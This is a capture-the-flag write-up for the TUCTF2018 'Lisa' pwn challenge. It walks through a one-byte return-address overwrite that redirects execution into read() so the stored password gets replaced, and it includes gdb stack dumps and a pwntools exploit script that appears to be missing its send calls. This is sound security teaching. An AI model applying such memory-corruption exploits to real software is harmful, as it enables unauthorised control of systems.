Tags: pwn 


# Lisa (PWN, 489)

### Task description

Difficulty: medium-ish
Ayo, Johhny's got your take from the job.
Go meet up with em' to claim your share.
Oh, and stop asking to see the Mona Lisa alright. It's embarrassing


### Solution

First of all, let's run this binary to understand what it does.

Here's your share: 0x57639160
What? The Mona Lisa!
Look, if you want somethin' from me, I'm gonna need somethin' from you alright...
Ugh! You kiss your mother with that mouth?

When running normally, it outputs the address of some share and then asks for the user input twice.
Now let's try to break it:

Here's your share: 0x57ded160
What? The Mona Lisa!
Look, if you want somethin' from me, I'm gonna need somethin' from you alright...
Ugh! You kiss your mother with that mouth?
Segmentation fault

Okay, it seems that we can cause a segmentation fault. But where can we go with it? To answer this question, let's look at the decompiled code:

int lisa()
// many lines of classical ascii-art
system("/bin/cat ./flag");
// many more lines of classical ascii-art

ssize_t fail(void *buf)
puts("Ugh! You kiss your mother with that mouth?");
return read(0, buf, 29u);

int checkPass()
int result;
char buf;

if ( doStrcmp(inp, (char *)pass) )
result = lisa();
result = fail(&buf;;
return result;

int main()
char our_password; // [esp+0h] [ebp-34h]

setvbuf(stdout, 0, 2, 20u);
setvbuf(stdin, 0, 2, 20u);
memset(&our_password, 0, 48u);
pass = malloc(43u);
printf("Here's your share: %p\n", pass);
puts("What? The Mona Lisa!\nLook, if you want somethin' from me, I'm gonna need somethin' from you alright...");
read(0, &our_password, 0x30u);
inp = &our_password;
pfd = open("./password", 0);
read(pfd, pass, 43u);
return 0;


As we've seen from experiments and as we see now from the source code, the program flow is pretty linear:

1. It fills memory dedicated to "our_password" variable with zeros and allocates space for the real password.
2. It outputs the address of real password.
3. It reads our password from stdin.
4. It reads the real password from "./password".
5. It compares both passwords and then:
1. If they are equal, it calls the lisa function.
2. Otherwise, it calls the fail function, which takes another user input and then goes up the stack to "return 0".

What draws our attention here is the function lisa: if we call lisa, we will get the flag. But to do so, we must know the correct password, mustn't we?
Well, it's hard to say when we look just at the source code. As we remember, we've succeeded to cause a segmentation fault. Let's do it again but this time with gdb.

Having been given long input like 'aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa', the program goes from "fail" back to "checkPass" and then tries to return to main. This is when something interesting happens:

EAX: 0x1d
EBX: 0x56559000 --> 0x3ef0
ECX: 0xffffd314 ('a' <repeats 29 times>, "]UVfirst_input\n")
EDX: 0x1d
ESI: 0xf7fa7000 --> 0x1d5d8c
EDI: 0x0
EBP: 0x61616161 ('aaaa')
ESP: 0xffffd330 ("a]UVfirst_input\n")
EIP: 0x56555801 (<checkPass+67>: ret)
EFLAGS: 0x286 (carry PARITY adjust zero SIGN trap INTERRUPT direction overflow)
0x565557fc <checkPass+62>: add esp,0x4
0x565557ff <checkPass+65>: nop
0x56555800 <checkPass+66>: leave
=> 0x56555801 <checkPass+67>: ret
0x56555802 <lisa>: push ebp
0x56555803 <lisa+1>: mov ebp,esp
0x56555805 <lisa+3>: push ebx
0x56555806 <lisa+4>: call 0x56555630 <__x86.get_pc_thunk.bx>
0000| 0xffffd330 ("a]UVfirst_input\n")
0004| 0xffffd334 ("first_input\n")
0008| 0xffffd338 ("t_input\n")
0012| 0xffffd33c ("put\n")
0016| 0xffffd340 --> 0x0
0020| 0xffffd344 --> 0x0
0024| 0xffffd348 --> 0x0
0028| 0xffffd34c --> 0x0
Legend: code, data, rodata, value
0x56555801 in checkPass ()
gdb-peda$ x/xw 0xffffd330
0xffffd330: 0x56555d61

Next instruction to be executed is located at 0x56555d61 (example with randomization turned off). But if we check in disassembler, we will see that the instruction following "call checkPass" should be located at 0x56555d22. Code for 'a' is 0x61. 0x56555d22. 0x61. 0x56555d61. Hmm.

If we remember that we are asked exactly 29 bytes in fail function, the reason for this result becomes clear on close examination of the stack layout:

Before writing many 'a's into buffer in fail():

0xffffd300: 0x0000001d 0x56559000 0xffffd32c 0x565557fc
(start of buffer)->|----we can write here--------------------
0xffffd310: 0xffffd314 0xffffd334 0xf7eb6bb0 0x56559000
-------------------------and here-------------------------
0xffffd320: 0xf7fa7000 0x56555d1a 0x00000003 0xffffd368
|- (<- this byte we also can overwrite)
0xffffd330: 0x56555d22 0x73726966 0x6e695f74 0x0a747570


0xffffd300: 0x0000001d 0x56559000 0xffffd32c 0x565557fc
0xffffd310: 0xffffd314 0x61616161 0x61616161 0x61616161
0xffffd320: 0x61616161 0x61616161 0x61616161 0x61616161
|- (<- last byte of return address)
0xffffd330: 0x56555d61 0x73726966 0x6e695f74 0x0a747570

We have overwritten one byte of return address to the main function (at 0xffffd330)! Let's look at what's located next:

gdb-peda$ x/s 0xffffd334
0xffffd334: "first_input\n"

It means that our first input follows just the return address to "main", one byte of which we can overwrite with our second input.
The problem here is that by overwriting return address we cannot go to the lisa function because its address ends with something like "xx|xx|x8|02" while we are restricted to the addresses matching "xx|xx|xD|XX".

Okay, now where shall we return?

0x56555d01 <main+193>: lea eax,[ebx+0x40]
0x56555d07 <main+199>: mov edx,DWORD PTR [eax]
0x56555d09 <main+201>: lea eax,[ebx+0x48]
0x56555d0f <main+207>: mov eax,DWORD PTR [eax]
0x56555d11 <main+209>: push 0x2b / number of bytes to read
0x56555d13 <main+211>: push edx / buffer to read into
0x56555d14 <main+212>: push eax / fd to read from
0x56555d15 <main+213>: call 0x56555550 <read@plt> / normally - reading the real password
0x56555d1a <main+218>: add esp,0xc
0x56555d1d <main+221>: call 0x565557be <checkPass>
0x56555d22 <main+226>: mov eax,0x0 / normally - location to which we return from checkPass
0x56555d27 <main+231>: mov ebx,DWORD PTR [ebp-0x4]
0x56555d2a <main+234>: leave
0x56555d2b <main+235>: ret / maybe return here?

My first guess was to return to the "ret" instruction of main, which, being followed by the actual address of lisa, will get us the flag. It works okay without randomization, but with it - no, it doesn't work.

But if we return to the "call read" instruction, we can overwrite any memory (almost) with any bytes because we control the values following stored EIP at stack, which are going to be arguments for read().

// from man pages for read()
#include <unistd.h>

ssize_t read(int fd, void *buf, size_t count);
// read() attempts to read up to count bytes from file descriptor fd into the buffer starting at buf.

If we use the given address of real password as a second parameter and stdin (fd = 0) as a first parameter, we can overwrite real password and make it match our own first input, which is comprised of all the necessary parameters. It results in a successful comparison of both passwords and getting awarded with the flag.

# solution in python

from pwn import *
import re
import struct
import time

r = process('lisa')
#r = remote('', 12345)
data = r.recvuntil('...\n')
print data
share = int(re.findall(r'share: 0x(\w+)', data)[0],16)

first_input = struct.pack('<I',0) # stdin
first_input += struct.pack('<I',share) # address of real password
first_input += struct.pack('<I',0x2b) # size of input

print r.recvuntil('mouth?\n')
# overflowing last byte of checkPass return address (to main)
second_input = '\x15' * 29

# duplicating first input so that the two match
unintended_third_input = struct.pack('<I',0)
unintended_third_input += struct.pack('<I',share)
unintended_third_input += struct.pack('<I',0x2b)

print r.recv()


Voila! (faked flag, yes)

Here's your share: 0x58015160
What? The Mona Lisa!
Look, if you want somethin' from me, I'm gonna need somethin' from you alright...

Ugh! You kiss your mother with that mouth?

[*] Process './lisa' stopped with exit code -11 (SIGSEGV) (pid 2044)
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Original writeup (https://github.com/ovProphet/writeups/blob/master/TUCTF2018/Lisa.md).